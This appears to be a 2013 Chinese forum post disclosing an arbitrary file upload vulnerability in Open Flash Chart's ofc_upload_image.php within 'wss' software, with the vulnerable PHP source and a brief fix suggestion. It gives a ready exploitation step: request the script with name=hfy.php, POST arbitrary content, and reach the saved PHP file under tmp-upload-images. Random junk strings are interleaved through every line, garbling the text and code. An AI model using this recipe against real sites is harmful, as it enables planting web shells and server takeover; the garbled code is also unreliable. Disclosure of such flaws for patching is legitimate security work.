POST 数据漏洞文件执行任意后缀文件保存) L: L6 o1 l9 M4 T* P( J9 b
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
8 Z: P6 n, ^) a a% F& l+ G( r1 y0 I- C: f+ D. @0 K
利用:/ S4 B* @4 s4 Q- [3 C
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
9 T1 ]- x5 |1 F+ o2 a9 A: {3 R* [# o& c) F( `- s0 \) r
Post任意数据
& [* e0 D* j1 ^ ?- p: H8 c2 [保存位置http://localhost/chart/tmp-upload-images/hfy.php
+ A) `9 T4 k7 X; q( i# V; Y) }* d: E/ B' ]3 \: F7 {/ [4 X4 E
! R0 t% h2 h3 \最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~) ?5 O& A9 u& a1 V& ` e" Z8 ^
. Y* q) C: P3 ]8 [% S) z<?php6 F" c5 a: a' [" r7 ? x8 p: C
' m! ^, T+ M/ m" @" w3 P7 K
//( W% h- R; k8 e2 C: ~1 U
// In Open Flash Chart -> save_image debug mode, you
" }2 g) T V; k2 d// will see the 'echo' text in a new window.4 N7 L# @6 o* [5 ?( q/ \5 s& U
//
3 K P8 y1 S7 o5 b) d" |( c) A% }
5 g/ u# V1 d; z$ U& ?+ u/*9 ?/ R; m) U4 i" Q
3 L# n4 K$ @& [) {, Q. T6 q R( D- [
print_r( $_GET );
* W. d* N# L c8 S% \% e- B0 ^- H$ gprint_r( $_POST );1 Z5 j6 o7 U% Y! k% Q v1 h
print_r( $_FILES );& e1 U2 {# J. A Q
' b4 \5 a e/ _1 ~5 W! C
print_r( $GLOBALS );+ [- b' k/ ], Q. a( c
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );/ d. L# ?& N X; m5 N! O
) v4 P y1 t- {
*// H1 w7 Q1 H% n6 h
// default path for the image to be stored //+ J( _( ]! M. _7 u
$default_path = '../tmp-upload-images/';
, h; _8 ]7 l. R/ b6 J
3 w. E; E& h! y6 Wif (!file_exists($default_path)) mkdir($default_path, 0777, true);
4 V, O: U, R) G- ] E% U! W1 g! L6 Y: g) W% o+ ~ N
// full path to the saved image including filename //
+ G- p; X; {5 ?, y3 s) s- e* n$destination = $default_path . basename( $_GET[ 'name' ] );
1 A! ]7 O: @6 A& C* v& u$ b6 e9 Q- U
echo 'Saving your image to: '. $destination;: k" U& ?+ f; w* x5 r! G
// print_r( $_POST );) h# d, `; \$ Y' n
// print_r( $_SERVER );4 j7 T. ^7 b9 G, O1 X* h- J
// echo $HTTP_RAW_POST_DATA;
) }( E1 B" ]5 k, e* @" x' a
/ P! O! [: F" H& K7 d5 a! o* ?9 G//$ k8 F- O+ }# a7 U2 E# T' E
// POST data is usually string data, but we are passing a RAW .png
. K6 J5 [0 g/ a- |* Z! r// so PHP is a bit confused and $_POST is empty. But it has saved
% k' P8 d( L v) Q( y// the raw bits into $HTTP_RAW_POST_DATA
9 N8 l! N' i- ?" Z7 \, s8 J//6 a& m; t' T0 \- H6 F! j: q
2 o7 W& |" z. [" c1 C1 {$jfh = fopen($destination, 'w') or die("can't open file");3 }* y3 S0 R) |- y, i* l' S
fwrite($jfh, $HTTP_RAW_POST_DATA);; Y! f8 m5 J; i) [) t. _9 T6 d
fclose($jfh);
0 N) |4 V7 B D- t$ s: x7 d# Q
. t$ n) l1 \2 A' Y6 {( A- \- N//
7 Y1 d- p7 M" F0 N- d& }// LOOK:
/ D q# W0 W/ I# P8 L//
$ N: h4 Q9 N- h: Jexit();
6 T7 f' S0 j& f( A+ M, J//0 _7 L0 w+ H$ L$ {+ f4 j ?
// PHP5:( K3 `4 J$ L% B0 \0 p* d8 ?0 n
//6 m! g7 D; L; s, u8 H+ i
; G* Y* W; v: ` P! D( j" n1 ^% Z" P$ q0 x
// default path for the image to be stored //* S. `! C$ H4 ^! l7 [ h
$default_path = 'tmp-upload-images/';# x+ H- U! C: l5 |. T0 ^ T8 w
8 W7 T7 [: Y1 E; R" r
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
% K5 z$ u# l) |+ r
W% ?8 U2 h8 m, Z& i' I; k// full path to the saved image including filename //
& E2 C% s J% F1 h$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
8 S$ l: }8 v4 D$ Q- V3 E. k* m. t4 X
// move the image into the specified directory //
K5 x" X; D! ~8 Q6 z Wif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {) _' ~, h: m* K+ C% {
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";1 L3 m4 }& r; U
} else {
4 `- O2 b; @" U/ o. K echo "FILE UPLOAD FAILED";
/ N/ F3 X2 |; }0 U& o}, Q- ]) B) e1 [3 K3 \
, Y f1 n' w& z1 V' l3 g2 m
0 g- V2 E( A2 B* V: Q4 z' r2 P P?>1 a9 u, R4 M Y, y4 v6 Z) ?
5 o7 a% y( L5 J. D2 v0 P0 M% I' e2 K$ a9 g5 I: c% u
1 K8 ?8 a; y; D1 m9 d$ ?
5 S" B P J9 j! T" y/ [6 z( o2 x
7 ?* G3 I7 U2 S# r" Z! m
修复方案: , ]! @% b" S/ z; T
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
3 x8 C7 p, t# }. u6 d& ?% e
' F( G8 ]0 N( e+ U3 K$ z- }: b4 m" J3 ^' g4 C+ ]+ Q) _
, L* v) W( J$ V7 u; e( n! V- H
5 [: |) E) E# R |
发表于 2013-2-23 12:38:58
收藏
支持
反对